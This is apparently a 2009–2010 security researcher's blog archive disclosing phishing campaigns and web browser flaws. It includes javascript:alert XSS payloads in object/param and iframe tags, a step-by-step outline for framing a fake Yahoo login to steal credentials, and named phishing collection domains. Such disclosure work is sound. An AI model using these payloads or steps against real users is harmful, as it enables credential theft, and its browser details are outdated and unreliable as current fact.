Recently HSBC, Paypal security phishing emails are used to steal the credentials of users. The phished email carry online form as an attachment which looks similar to the original HSBC bank forms for updating the credentials of the user.

Case 1 - Paypal Verification Credentials Theft

The email is sent by phisher on the behalf of Paypal verification group for re-verifying your credentials. The email looks like as

During analysis the attachment is downloaded in a restrictive environment to scrutinize against malware, infection handlers etc.

Luckily the form page does not contain malware but the form is posted to a attacker controlled domain (http://probe.201w.com/verification.php) for verification as:

On further analyzing the domain, we came across the fact that some of the users have fallen into this trap as:

The users inability to distinguish between the trust boundaries lead to compromises and information stealing.

Case 2: HSBC Verification Credentials Stealing

We performed simple analysis in controlled environment. The form looked like as

The form itself does not contain any sort of malware but the form is posted to the malicious domain (http://www.thebluzmen.com/verify.php) for verification as

A normal user should be aware of the artifacts used by the phishers to betray the trust.

Papers Published - HITB EZine and Hakin9

2010-05-05T11:00:00.000-07:00

We have just published new papers in Hack in the Box EZine and Hakin9. The magazines are free and can be fetched from below mentioned links:

1. Open Redirect Wreck Off - HITB EZine
The paper talks about the real time scenarios analyzed while conducting security assessments of different websites. It has been detected that these websites are prone to invalidated redirects and forward issues. Recently, with the release of OWASP 2010 RC1 release, A8 has been marked against the redirection based flaws in websites. The
attacker can control the user’s trust behavior to visit the website which is malicious and controlled by the untrusted party

http://www.hackinthebox.org/misc/HITB-Ezine-Issue-002.pdf

2. Pwning Embedded ADSL Routers - Inside LAN | Hakin9
The paper is restricted to not only testing but also discusses the kinds of software
and firmware used and incessant vulnerabilities that should be scrutinized while
setting up a local network. A detailed discussion will be undertaken about the HTTP servers used for handling authentication procedure and access to firmware image providing functionalities to design and configure your own home local area network.

http://download.hakin9.org/en/hakin9_04_2010_EN.pdf

Phishing Driven with Malware - Chase Bank Spamming

2010-05-05T10:39:00.000-07:00

Everyday, number of spam mails are sent to the customers to leverage information. This process not only results in devastation of network bandwidth but also affect the normal functioning of organizations. Many companies apply spam filters which work well to some extent but still spammers find a way to hit the internal network. There are number of defined ways to send an email in a spoofed manner.

This email carries an attachment which tempts the user to update his credit card information. The phisher used a good trick in completely validating the trust bu using the appropriate GUI interface as trusted by chase. Usually an alert notification is appended by the regular email server software but that is not suffice enough to prevent the attacks as such. The reason which favor this attack is the trust level set by the phisher with the victim. Mostly, victims fall into a trap where monetary transactions are concerned. The attachment is present as following

The attachment looks promising but it is not considered as authentic. all the links are pointed to:
[1] http://www.chase.com/
[2] http://www.chase.com/ccp/index.jsp?pg name=ccpmapp/shared/assets/page/Privacy Policy
[3] http://www.chase.com/ccp/index.jsp?pg name=ccpmapp/shared/assets/page/Security Center
[4] http://www.chase.com/cm/cs?pagename=Chase/Href&urlname=chase/cc/terms

Further we scratch through the source code and relative interfaces and we detected some strange code as encryption provided by chase. The construct is presented below

We submit the values in the form by pressing in the next button as:

After submitting the form the sniffer is activated to check the HTTP requests, the HTTP request is sent as mentioned below

We tried to look into the encryption code and upon reversing it, we detected that

The form is submitted to 213.210.237.83. We detected information as:
canonical name stat.leaseline.nesma.net.sa. — aliases— addresses 213.210.237.83
The domain belongs to: domain: nesma.net.sa

organization: National Engineering Services& Marketing (NESMA)
address: Olay St.
address: P.O.Box 9260
address: 11413 Riyadh
address: Saudi Arabia
admin-c: MB137-SA
tech-c: MB137-SA
reg-c: MB137-SA
nserver: ns1.nesma.net.sa
nserver: ns2.nesma.net.sa
req-date: 1998-12-21
reg-date: 1999-04-28
source: SaudiNIC
inetnum: 213.210.237.0 - 213.210.237.255
netname: NESMA
descr: National Engineering Services and Marketing Company Ltd. (NESMA)
country: SA
status: ASSIGNED PA
changed: NOC@nesma.net.sa 20050322
source: RIPE

On further analysis we tried to enumerate any email server running on this IP address , we found that

FTP - 21 Error: ConnectionRefused
SMTP - 25 220 moajiladmin Microsoft ESMTP MAIL Service, Version: 6.0.2600.2180 ready at Sun, 18 Apr 2010
19:58:10 +0300
HTTP - 80 Error: ConnectionRefused
POP3 - 110 Error: ConnectionRefused
IMAP - 143 Error: ConnectionRefused
Voila ! the email server is running. On querying the server we find that
220 moajiladmin Microsoft ESMTP MAIL Service, Version: 6.0.2600.2180 ready at Sun, 18 Apr 2010 20:07:16 +0300
EHLO
250-moajiladmin Hello [XX.YY.XX.AA]
250-SIZE 2097152
250-PIPELINING
250-DSN
250-ENHANCEDSTATUSCODES
250-8bitmime
250-BINARYMIME
250-CHUNKING
250-VRFY
250 OK
214-This server supports the following commands
214 HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT VRFY

At last, the base was detected. One or the other way, the impact is really high from exploitation point of view. The case study tries to explain the infection vectors from top to the bottom in a phishing attack. The cases can be more severe but revolves around the same paradigm.

NoScript 1.9.9.35 - XSS Injection Checker Nested Complexity Bug still persists

2010-01-09T10:25:00.000-08:00

Just a few days ago I talked about the complexity issue with the NoScript author and the false positives encountered. I released a document on the below mentioned link:

http://secniche.org/papers/noscript_xss_chk_comp_flaw.pdf

Read it for the issue in action. Soon after that there were some build versions and finally 1.9.9.35 is out. but seems like this complexity issue still persists. This time it worked with more stealthier JavaScript and Injection Checker raises the false positive.

The complex links are from ad.doubleclick.net and are presented below:

http://www.linkedin.com/html/addineyeV2.html?strBanner=gEbServerData%3D%271%3A%3A1225342%3A%3A2272675%3A%3ASite-20936/Type-11/2272675_e0b24616-1ae2-4643-baee-12ebdd7a1647.js%3A%3AExpBanner%3A%3A0%3A%3A%3A%3A%3A%3A0%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A1%3A%3A94684%3A%3A0%3A%3A0%3A%3A%3A%3A%27%3BgEbBannerData%3D%2715264925553351627%3A%3A1%3A%3A300%3A%3A250%3A%3A%3A%3A%3A%3A1%3A%3A0%3A%3A30%3A%3A%3A%3A%3A%3A%3A%3A0%3A%3A0%3A%3Atrue%3A%3A%3A%3Afalse%27%3BgEbInteractions%3D%27%5B_eyeblaster%2Chttp%253A//ad.doubleclick.net/click%253Bh%253Dv8/391c/3/0/*/v%253B221038779%253B0-0%253B11%253B40521440%253B4307-300/250%253B34909454/34927284/1%253Bu%253D18348940%253B%257Eaopt%253D2/0/ff/0%253B%257Esscs%253D%253F%2C%5D%27%3BebSrc%3D%27http%253A//ds.serving-sys.com/BurstingCachedScripts/ebExpBanner_3_0_67.js%27%3BebResourcePath%3D%27http%253A//ds.serving-sys.com/BurstingRes//%27%3B%3BebO%3Dnew%20Object%28%29%3BebO.sms%3D%27ds.serving-sys.com/BurstingScript/%27%3BebO.bs%3D%27bs.serving-sys.com%27%3BebO.fvp%3D%27Res/%27%3BebO.rpv%3D%27_2_5_1%27%3BebO.pv%3D%27_3_0_3%27%3BebO.pi%3D0%3BebO.wv%3D%27_3_0_1%27%3BebPtcl%3D%27http%3 //%27%3BebO.bt%3D2%3BebO.bv%3D3%3BebO.plt%3D8%3BgEbDbgLvl%3D0%3BgnEbLowBWLimit
%3D120%3B]

Another sanitized one:

http://ad.doubleclick.net/adi/linkedin.dart/home_nn;optout=false;lang=en;v=1;u=18348940;ue=1utcdckqzgglwtt4uqu6ap;title=o;title=ic;func=null;co_id=233588;co_id=376101;co_id=3027;co_id=60837;ind=96;ind=82;ind=121;ind=118;csize=d;csize=a;csize=h;csize=c;csize_num=1;csize_num=50;csize_num=7000;zip=110005;gdr=u;cntry=sg;reg=0;grp=3120;grp=54384;grp=113049;grp=115855;grp=742197;grp=894157;grp=1485107;grp=1613377;grp=1777141;grp=1805569;grp=1848637;edu=13494-2008;jobs=1;sub=0;con=j;age=a;age_num=24;seg=190;seg=218;tile=2;sz=300x250;extra%3Dnull;ord=41888994?]. Sanitized URL: [http://www.linkedin.com/html/addineyeV2.html?strBanner=gEbServerData%20%201%3A%3A1225342%3A%3A2272675%3A%3ASite-20936%2FType-11%2F2272675_e0b24616-1ae2-4643-baee-12ebdd7a1647.js%3A%3AExpBanner%3A%3A0%3A%3A%3A%3A%3A%3A0%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A1%3A%3A94684%3A%3A0%3A%3A0%3A%3A%3A%3A%20%3BgEbBannerData%20%2015264925553351627%3A%3A1%3A%3A300%3A%3A250%3A%3A%3A%3A%3A%3A1%3A%3A0%3A%3A30%3A%3A%3A%3A%3A%3A%3A%3A0%3A%3A0%3A%3Atrue%3A%3A%3A%3Afalse%20%3BgEbInteractions%20%20%20_eyeblaster%2Chttp%253A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F391c%2F3%2F0%2F*%2Fv%253B221038779
%253B0-0%253B11%253B40521440%253B4307-300%2F250%253B34909454%2F34927284%2F1%253Bu%25
3D18348940%253B%257Eaopt%253D2%2F0%2Fff%2F0%253B%257Esscs%253D%253F%2C%20%20%3BebSrc%20%20http%253A%2F%2Fds.serving-sys.com%2FBurstingCachedScripts%2FebExpBanner_3_0_67.js%20%3BebResourcePath%20%20http%253A%2F%2Fds.serving-sys.com%2FBurstingRes%2F%2F%20%3B%3BebO%20new%20Object%20%20%3BebO.sms%20%20ds.serving-sys.com%2FBurstingScript%2F%20%3BebO.bs%20%20bs.serving-sys.com%20%3BebO.fvp%20%20Res%2F%20%3BebO.rpv%20%20_2_5_1%20%3BebO.pv%20%20_3_0_3%20%3BebO.pi%200%3BebO.wv%20%20_3_0_1%20%3BebPtcl%20%20http%3A%2F%2F%20%3BebO.bt%202%3BebO.bv%203%3BebO.plt%208%3BgEbDbgLvl%200%3BgnEbLowBWLimit%20120%3B#
20340333708575276684].

On further discussion with NoScript author the complexity in this issue is more versatile due to the presence of JavaScript in a more stealthier manner. It looks like as

gEbServerData = "1::1225342::2272675::Site-20936/Type-11/2272675_e0b24616-1ae2-4643-baee-12ebdd7a1647.js::ExpBanner::0::::::0::::::::::1::94684::0::0::::";
gEbBannerData = "15264925553351627::1::300::250::::::1::0::30::::::::0::0::true::::false";
gEbInteractions = "[_eyeblaster,http%3A//ad.doubleclick.net/click%3Bh%3Dv8/391c/3/0/*/v%3B221038779%3B0-0%3B11%3B40521440%3B4307-300/250%3B34909454/34927284/1%3Bu%3D18348940%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3F,]";
ebSrc = "http%3A//ds.serving-sys.com/BurstingCachedScripts/ebExpBanner_3_0_67.js";
ebResourcePath = "http%3A//ds.serving-sys.com/BurstingRes//";
ebO = new Object;
ebO.sms = "ds.serving-sys.com/BurstingScript/";
ebO.bs = "bs.serving-sys.com";
ebO.fvp = "Res/";
ebO.rpv = "_2_5_1";
ebO.pv = "_3_0_3";
ebO.pi = 0;
ebO.wv = "_3_0_1";
ebPtcl = "http://";
ebO.bt = 2;
ebO.bv = 3;
ebO.plt = 8;
gEbDbgLvl = 0;
gnEbLowBWLimit = 120;

The author seems like not interested in this layout because the scripts can not be allowed in this complex part. This means False Positive persists in the NoScript XSS Injection Checker. You are going to accompany it as:

This can lead to ambiguity whether there is a XSS attempt in real or not and can impact the user experience to some extent. All on users acceptance.

Google Chrome 3.0.195.38 | Chrome Frame - Reloading Memory Allocation based Tab Crashing

2010-01-08T06:00:00.000-08:00

Google Chrome, right from the start has shown some stringency in tab crashing. But crashing tabs or full browser crash is becoming more smoother than the previously reported cases. On playing around with Google Chrome and Chrome Frame direct tab crashing has been reloaded. The specific points are mentioned below:

1. Scripts are checked against memory allocation part and raises a warning.
2. In recent versions playing around with JavaScript based conversion of Unicode
values to characters and rendering it directly leads to tab crashing.
3. It has become more smoother and direct in the functionality.

The software tested against this rule set is mentioned below:

1. Google Chrome Browser
2. Google Chrome Frame. (IE8)

Both are installed on x64 systems running windows vista and IE8. The test is based on the script code designed to show the tab crashing in controlled manner.

Video :- Google Chrome 3.0.195.38 | Chrome Frame - Reloading Memory Allocation based Tab Crashing

IE8 directly raises a warning as:

IE8 functionality is hampered. The crash produces a register state as mentioned below:

EAX 00000000
ECX 3F800000
EDX 00000005
EBX 1FC00000
ESP 013DED00
EBP 013DED1C
ESI 0FDFFFF7
EDI 00CDEA00
EIP 6A28FCAA chrome_1.6A28FCAA
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 1 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDA000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_NOT_ENOUGH_MEMORY (00000008)
EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty 0.0
ST1 empty 0.0
ST2 empty 236.00000000000000000
ST3 empty 0.0
ST4 empty 0.0
ST5 empty 1000.000000000000000
ST6 empty 309683.00000000000000
ST7 empty 0.0747806972940452397
3 2 1 0 E S P U O Z D I
FST 0020 Cond 0 0 0 0 Err 0 0 1 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1

The issue presented in this post shows the advancement in execution of scripts and silently crashing the tabs. This issue has been designed as a controlled layout for showing the possibilities of crashing in Chrome.

Note: This is designed for educational purposes and improving the functionality of open source software.

Link Injection Redirection Attacks - Exploiting URL Pattern in Google Chrome - Browser Design Failure

2010-01-05T04:18:00.000-08:00

Update: As pointed by Google in the below mentioned link that issues was not reported previously.

http://www.webappsec.org/lists/websecurity/archive/2010-01/msg00022.html

We strictly believe in responsible disclosures. It was reported on 28 November 2008 and the status was changed to "Wont Fix" by the team itself. You can have a look at:

http://code.google.com/p/chromium/issues/detail?id=4739

Recently with an outcome of Owasp RC1 top 10 exploited vulnerability list , redirection issues have already made a mark in that. Even the WASC has included the URL abusing as one of the stringent attacks.

Well to be ethical in this regard these are not the recent attacks but are persisting from long time. The only difference is the exploitation ratio has increased from bottom to top. So that's the prime reason it has been included in the web application security benchmarks. But the projection of redirection attacks is active now.

This post is not about explaining the basics of redirection issues. It is more about the design vulnerabilities in browsers that can lead to potential persistent redirection vulnerabilities. We will implement this attack as an example scenario against the long persisted vulnerability in Google Chrome released long back by Secniche Security. The details of this vulnerability can be found at below mentioned links:

1. Google Chrome URL Obfuscation Vulnerability.
2. Milw0rm Database
3. Securityfocus

The issue has been notified to Google Chrome Security team many times but it is still persisting and can be effectively exploited. Considering other browsers such as Mozilla , IE8 below mentioned restrictions have already been implemented as:

1. Mozilla has implemented an alert check when ever rogue link is clicked informing the user for the malicious operation in process.

2. IE8 has completely changed the link interpretation behavior.

The attack scenario - (Web Application Security Testing)

1. A vulnerable website prone to redirection.
2. Browser vulnerability in interpreting injected links: Google Chrome

The video can be seen here:

Link Injection Redirection Attack - Exploiting Google Chrome Design Flaw

Regards

Design Inaccuracy - Cross Link Authoring Flaw - Scribd Flaw - iPaper Platform

2010-01-04T06:15:00.000-08:00

This paper sheds light on the technique of bypassing the iPaper platform for launching a number of web attacks. This iPaper platform is a new document format that is used for online document viewing and is comparatively easy to manage. It is used by a large number of websites. The best example is the Scribd network which hosts a large number of documents online. Extensive testing shows that this platform is vulnerable to a number of web attacks.

Read the paper at : Whitepaper

NoScript XSS Injection Checker Unescaping Nested URL Stringency - False Positive

2010-01-03T06:03:00.000-08:00

The NoScript has shown some stringent false positive in dealing with complex URL pattern and escaping it appropriately. Please check the document:

Fetch the Doc

For effective development of community based software.

Yahoo Babelfish - SYSTRAN Base - Is that a Culprit? Well Let's See The WorkOut.

2010-01-01T04:23:00.000-08:00

The frame injection flaw discussed previously has lot of impacts and can be exploited in the wild in a diversified manner. Primarily the two basic checks are missing in the applied online translation strategy opted by the Yahoo Babelfish and Systran. The Systran is the base software used by yahoo for translating contents online. Primarily the application is desktop based but has another form of online translation. On scrutinizing the Systran service the design looks similar that is used by the Yahoo Babelfish.

Even if anybody want to opt the same design there should be some type of notifications provided with that. Basically with this type of translation design following checks should be followed:

1. Priavcy statement or content verification notification should be mentioned in the base message bar.

2. The translation source and destination should be mentioned.

3. Its a good solution to randomize the source URL and appends a differential URLID parameter that cannot be guessed.

The third solution is quite good because direct reference cannot be made and source check is maintained when a malicious translation request is issued.

Both these adequate steps are missing in Yahoo Babelfish and Systran. Microsoft, in this case has a upper hand by deploying both these notifications even after following the same translation design. At least user is always aware of fact that the content should not be considered as trusted. The prototype looks like as presented below:

While loading the Yahoomail URL for translation the translation server gives the below mentioned error

The only point to look into this translation is to check the three benchmark artifacts listed above. Lets try another part. It is noticed that Systran online translation engine fetches the URL pattern as mentioned below:

http://sysurl.systranet.com/?systrangui=www.systran.co.uk%3B/snetcom/web&systranbanner=1&systranuid=aHR0cC13d3cueWFob28uY29tL2VuX2Zy

The first two notifications as discussed above is not followed. But yes to some extent he URL randomization point is applied. I am not saying that it is an appropriate solution but if every time a new ID is being provided it can be considered as a good solution to some extent. Of course it is.

The overall scenario is in front. The applied solution is our choice. If Yahoo Babelfish has opted the base pattern then good practices should be followed too.

Google Chrome/ WebKit - MSWord Scripting Object XSS Payload Execution Bug and Random CLSID Stringency

2009-12-27T23:18:00.000-08:00

Google Chrome (including customized webkit)has shown unethical behavior in implementing an embedded object with CLSID parameter. The design bug is presented in the execution of the object element directly in the context of browser. The bug proliferates when a CLSID of certain object is passed and specific URL is allowed to execute as parameter value in it. Before jumping into all aspect of this unexpected and chaotic behavior , let's have a brief look at the W3 specification

!ELEMENT OBJECT - - (PARAM | %flow;)*
-- generic embedded object -->
!ATTLIST OBJECT
%attrs; -- %coreattrs, %i18n, %events --
declare (declare) #IMPLIED -- declare but don't instantiate flag --
classid %URI; #IMPLIED -- identifies an implementation --
codebase %URI; #IMPLIED -- base URI for classid, data, archive--
data %URI; #IMPLIED -- reference to object's data --
type %ContentType; #IMPLIED -- content type for data --
codetype %ContentType; #IMPLIED -- content type for code --
archive CDATA #IMPLIED -- space-separated list of URIs --
standby %Text; #IMPLIED -- message to show while loading --
height %Length; #IMPLIED -- override height --
width %Length; #IMPLIED -- override width --
usemap %URI; #IMPLIED -- use client-side image map --
name CDATA #IMPLIED -- submit as part of form --
tabindex NUMBER #IMPLIED -- position in tabbing order --

classid = uri [CT]
This attribute may be used to specify the location of an object's implementation via a URI. It may be used together with, or as an alternative to the data attribute, depending on the type of object involved.

data = uri [CT]
This attribute may be used to specify the location of the object's data, for instance image data for objects defining images, or more generally, a serialized form of an object which can be used to recreate it. If given as a relative URI, it should be interpreted relative to the codebase attribute.

So as per the recommendations codebase matters a lot. The value should work according to the included object which is known by the CLSID. That's true in the implementation of CLSID parameter through embedded object.

The code that executes positively is mentioned below:
[OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>
[param name=url
value=javascript:alert('XSSXSSXSXSXSXSXSXSXSXSXSXSSXSXSXSSXSXXSSS')]
[/OBJECT]

Certain facts are mentioned below

1. The CLSID parameter presented in this part is of MSWORD Scripting Object. The good part is that this code does not get executed in the Internet Explorer 8 and there is no XSS payload execution.

2. All the other browsers such as Mozilla Firefox , Opera and Safari does not execute
this set of payload too. The Safari, which also implements webkit at prime scale does not show any contradictory behavior in this regard.

3. If we talk about HTML5 specification , this is completely unethical in saying that the Google Chrome implements HTML5 then this kind of behavior is accepted. In concern to that latest version of Safari 4 also implements HTML5 specification to a great extent but this execution behavior is not supported.

The contradiction arises as:

1. Google Chrome, itself based on the Webkit and to best of the knowledge , Active X is not supported by the Webkit and Linux platforms. Its a pure windows object class identifiers.

"ActiveX is only supported by Internet Explorer (and browsers built on top of Internet Explorer) on Windows. Google Chrome, Mozilla Firefox, Apple Safari, and others do not support ActiveX. Instead, these browsers make use of the Netscape Plugin Application Programming Interface (NPAPI)."

More:http://www.google.com/chrome/intl/en/webmasters-faq.html#activex

But the general functionality of DOM object execution is based on top to bottom approach i.e tree notation. Primarily the element at the top executes first and then so on.

2. Google Chrome executes the payload in a same manner( which can be used for XSS extensively) with or without the CLSID parameter. This is contradictory in its own sense. One cannot say in any specific nature of browsers that XSS payload execution with or without the CLSID is the same. Its not the appropriate functional part. As the code base point is mentioned in the W3 specification. The URI points to the object location. Ofcourse!

Note: If the browser base is not supporting any type of specific tag attributes the inline code present in it should not be executed. One cannot say that the browser does not recognize the CLSID and it passes the control to the inline object parameter and executed the URI which is completely against the part as the URI is itself defined for that object.

On the second part code execution without the CLSID is generic , in no way it is similar the payload execution with CLSID.

The overall picture of this kind of issue with respect to other browsers is presented below

This represents the overall scenario. The payload can be used to execute XSS attacks stringently. the best probable solution is not to allow code when executed with CLSID as presented in this talk.

On a simpler talk with Google Chrome team about this against the turf behavior there are certain responses which are unacceptable in any case: Have a look

"There is a special case for the "data", "movie" and "src" attributes: http://svn.webkit.org/repository/webkit/trunk/WebCore/html/HTMLParamElement.cpp in "isURLAttribute" and "addSubresourceAttributeURLs".

I expect this has to do with our DNS prefetching; we attempt to start downloading
stuff as soon as we know about it. It may be that Chrome special cases this type of
PARAM, expecting it to be a URL. When it finds out there is nothing to grab off the
internet, it is handled like any other URL and the javascript is executed. The code
may need a bit of tweaking to prevent it from executing javascript; it should only
start download the resource if it contains a valid URL."

"The DNS preresolution would, at the most, do a resolution of a domain, but would never trigger any content fetch or JS execution.

There is also some scanning of content, and pre-fetching expected content. I'd be VERY surprised to hear that it leads to execution prior to such necessity."

"I am actually really curious as to why Chrome is behaving this way, even for unknown clsids. I am guessing it is some sort of a heuristic prefetching mechanism that triggers on parameters named "url"?

If my guess is correct, it would be good to have a peek at this mechanism, and limit
it to http / https, just so that it does not introduce problems elsewhere. That said, I do not see any obvious way how the current behavior would have a negative impact on common web sites - i.e., why we should treat it as a security problem."

"I agree with previous assessment that this is not a particular security issue.I also agree that it would be good to understand the behaviour. Hence: It looks to be WebKit simply passing plugin payload URLs to the frame loader, verbatim.This simply means that in Chrome, the following two URLs constructs behave similarly:

1)[object][param name="url" value="javascript:alert(document.domain)">
[/object]

2)[iframe src="javascript:alert(document.domain)"][/iframe]And obviously, it is any given website's responsibility to NOT pass arbitrary attacker-supplied URLs in either of those attributes."

This statement "it is any given website's responsibility to NOT pass arbitrary attacker-supplied URLs in either of those attributes." is completely obscure with
respect to this bug.

Security Concern: The differential set of payloads always favor the XSS execution and browser inabilities to follow the standard benchmarks.

The result is nothing and no output is on the way. The more stress is not to consider it as a security bug rather finding the real obscurity in it but one can enjoy with this part.

It is seriously out of the way.

Cheers.

Google Sites Privacy Chaos - Is it unthical or Is this the way it has to be? A Talk!

2009-12-24T22:24:00.000-08:00

Google site provide services to the users for hosting their websites on Google. I was going through the privacy column of this website due to an issue that pop up in front of me. The policy is presented below:

There is an excerpt in this privacy policy of Google Sites

You may permanently delete any content you create in Google Sites. Because of the way we maintain this service, residual copies of your files and other information associated with your account may remain on our servers for three weeks.

http://www.google.com/sites/privacy.html

This is completely not true. The policy point is quite okay but considering the real time functionality this is not applicable in an appropriate manner. The time period for residual copies is set for three weeks , I suppose not more than a month. I personally tested the stuff six months back. I have noticed even after the duration of six months , the file which was deleted (a PDF file which I do not want anybody to look into) six months back, it is still recoverable from the Google site , a quite unacceptable fact because a deleted content should not reside more than three weeks. User thinks that content is deleted but its not like that. Things work differently.

Let's see:

So there is an ambiguity in the applied policy of Google sites. Is the policy being implemented in right way?

Ofcourse , Google owns web!

Google Translate - Google User Content - File Uploading Cross - XSS and Design Stringency - A Talk

2009-12-24T21:28:00.000-08:00

Google translate services provide an efficient way of translating content. The web is as a playground of attackers and everyday new bug or flaw is noticed in the web services provided by major giants. There is another web based design issue in applicability of user generated content. On discussion with Google about this problem , the issues is treated as design by default.

The problem (or web bug)persist in the file uploading feature on Google translate website and translating content into requisite choice. Malicious content such as XSS payload , Iframes etc is executed and rendered into the another domain of user. On discussion with Google it was stated that:

"With JavaScript is executed on the translate.googleusercontent.com domain,rather than translate.google.com. This is by design as files uploaded to the translate service are regarded as untrusted content."

There are two features provided by Google translate service which are mentioned below
1. Translation through file uploading.
2. Direct translation of content online.

If the Google does this be default like mentioned earlier then the content translated directly online should be considered as untrusted too. The frame injection attacks are not conducted in a stealth manner in Google translate services because toolbar displays the source and conversion languages directly. That's an attack scenario.

Question: Why users consider translation services as secure? What If somebody is doing some monetary transaction or some other issues like that?

The question and answer in itself is hard to answer. But one thing is sure for any critical work the translate services should not be used especially online services.

Let's have a look at the attack point:

Step 1: Uploading a malicious content file through Google Translate service

Step 2: Executing Content

Another layout

Looking at the different domains

1. translate.google.com

Name: www3.l.google.com
Addresses: 209.85.231.102
209.85.231.100
209.85.231.101
Aliases: translate.google.com

2. translate.googleusercontent.com

Name: googlehosted.l.google.com
Address: 209.85.231.132
Aliases: translate.googleusercontent.com

Both the google.com and googleusercontent.com serves the same google search functionality. The specific user content server can be used for differential purposes because content on it is not trusted.

Looking for the different perspective.It would be great if a small message is
being displayed on the Google translate service bar as mentioned below

"Google does not assure the integrity of source of the content"

After considering this as a notification I checked the Bing Translation which already have applied this notification message. Great.

May be its not a solution but a good step in visualizing your concern about content. Well , that's some of the Microsoft solutions are really good to save your own ethics and business :)

Note: a previously reported phishing vulnerability in Google Translation which was patched and checked was introduced by Google on the source and destination translation languages.
http://secniche.org/advisory/Google_Trans_Adv.pdf

Yahoo Babelfish - Possible Frame Injection Attack - Design Stringency

2009-12-19T08:42:00.000-08:00

Yahoo Babel-fish online service for translating content to different languages. The stringent design bug leads to the possibility of conducting FRAME injection attacks in the context of yahoo domain there by resulting in third party attacks. The issues has been demonstrated in some of my recent conferences. The flaw can be summed up as:

1. There is no referrer check on the origin i.e. the source of request.
2. Direct links can be used to send requests.
2. Iframes can be loaded directly into the context of domain.

Points to Ponder
1. Yahoo login Page – perform certain checks , authorized ones.
2. Yahoo implements FRAME Bursting in the main login Page.

It is possible to remove that small piece of code and design a similar page with same elements that can be used further. It is possible to impersonate the trust of primary domain (YAHOO in this case) for legitimate attacks. There is a possibility of different attacks on YAHOO users.

Note: there is no specific notification is displayed on the top of translated page.

Attacker can conduct a FRAME attack by following below mentioned steps

1. Remove the above stated entities code from the main Login Page.
2. Design the fake domain. Load in the context of Yahoo domain
3. Inline IFRAME provides a familiar fake Login page.
4. Set the backdoor in the Login input boxes for stealing credentials.
5. Trap the victims by diversifying the manipulated URL’s on the Web.One can use
dedicated spamming.
6. The attack is all set to work.

Step 1: Injecting IFRAME - Modified

Step 2 – Stealing Credentials

DEMONSTRATION

This attack works successfully. This is a demo setup.You can try some credentials and try to login. :)

CSRF - Browser Dependency Factor - Yes it Persists

2009-12-06T03:39:00.000-08:00

CSRF attacks have been used quite often in attacking small edge routers which are having web interfaces on port 80. Recently I presented the same attack using Microsoft EOT (Embedded Open Type) font technology. As part of it , EOT fonts can be included in the web page and loaded dynamically. It has been discussed quite often about the nature of CSRF attacks and stringency of basic authentication. As I re tested the CSRF through EOT again and discovered that browser plays a critical role in flourishing these attacks with the same nature as discussed. The attack works nicely. With lot of changes in IE8 , the stealth part is not happening. It shows the error popup and even background image tag does not work the same way it is supposed to be.

IE7 and IE8 has plethora of working differentiability in their functionality. The EOT can be used to launch authentication error free CSRF prior to version IE8. But it shows variation with IE running on different platforms. As a result of it conducting stealth CSRF have become quite hard. Microsoft has completely transformed the base pattern by incorporating secure design features. Good work Guys.

There are some point that are need to be looked upon

1. IE8 and Mozilla 3.x has has completely changed the working because the execution of http://username:password@example.com is not allowed.

2. Any CSRF attack based on above mentioned scenario will no take place as no request is being sent to the server directly.

3. There is an appropriate chance of conducting the CSRF attacks through SAFARI with the same syntax as discussed before. It perfectly works fine.

The variation occurs in conducting the stealth free CSRF which is not that easy to trigger because of differential nature of browsers. The browser interpretation of different tags have dramatic impact on the attacks to happen successfully in real time environment.

HTTP X Protection Headers - Microsoft Google Stringency

2009-11-24T18:25:00.000-08:00

Recently I was reading news headline at security-focus http://www.securityfocus.com/news/11565 about the flaw in Microsoft XSS filter implementation and Google's view over it. We have conducted extensive research on this part in understanding the limitations of the design filter and all. The point to think over this part is even Google has taken some steps to leverage this functionality and considering it as a negative process. Things are quite repulsive looking at the ongoing scenario.

The terminology states that HTTP has X Factor protection considering the protection parameters implemented at the HTTP base level. Steps are taken to improve the functionality by inculcating the HTTP headers and applying it at the real time environment.

Looking at this scenario , I triggered my emulator with perl as base to write some lines of code to check the GWS server by Google at port 80.

[Google Check]

C:\Perl\bin>perl http_X_enum.pl google.com

(*) http_X_enum.pl - HTTP[X] protection enumerator
(*) enumerates (clickjacking,mime sniffing,xss protection, content download , csp etc) applied defense.
(*) web application security assessment script
(*) written by 0kn0ck [at] secniche.org

(*) checking the state of server through icmp requests.
(*) google.com is subjected to be alive

Server: gws

[+] ++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] checking for applied defense on domain : google.com
[+] ++++++++++++++++++++++++++++++++++++++++++++++++++++

[+] detected possible [X-XSS-Protection: 0 ] xss protection parameter : X-XSS-Protection: 0

[-] http parameter [X-XSS-Protection: 1] defense is not applied at domain.
[-] http parameter [X-FRAME-OPTIONS: DENY] clickjacking defense is not applied
[-] http parameter [X-FRAME-OPTIONS: SAMEORIGIN] clickjacking defense is not applied
[-] http parameter [X-CONTENT-TYPE-OPTIONS: NOSNIFF] mime handling-sniffing opt out is not applied
[-] http parameter [X-DOWNLOAD-OPTIONS: NOOPEN ] mime handling- download force save is not applied
[-] http parameter [X-CONTENT-SECURITY-POLICY: ALLOW SELF] content policy is not applied.
[-] http parameter [X-CONTENT-SECURITY-POLICY: ALLOW https://self] content policy is not applied.
[-] http parameter [ACCESS-CONTROL-ALLOW-ORIGIN] csrf origin access is not applied.

=================[DEBUG]=============================

HTTP/1.1 301 Moved Permanently
Location: http://www.google.com/
Content-Type: text/html; charset=UTF-8
Date: Wed, 25 Nov 2009 02:38:09 GMT
Expires: Fri, 25 Dec 2009 02:38:09 GMT
Cache-Control: public, max-age=2592000
Server: gws
Content-Length: 219
X-XSS-Protection: 0

=================[DEBUG]=====================
[+] execution success.

Lets; see Yahoo

C:\Perl\bin>perl http_X_enum.pl yahoo.com

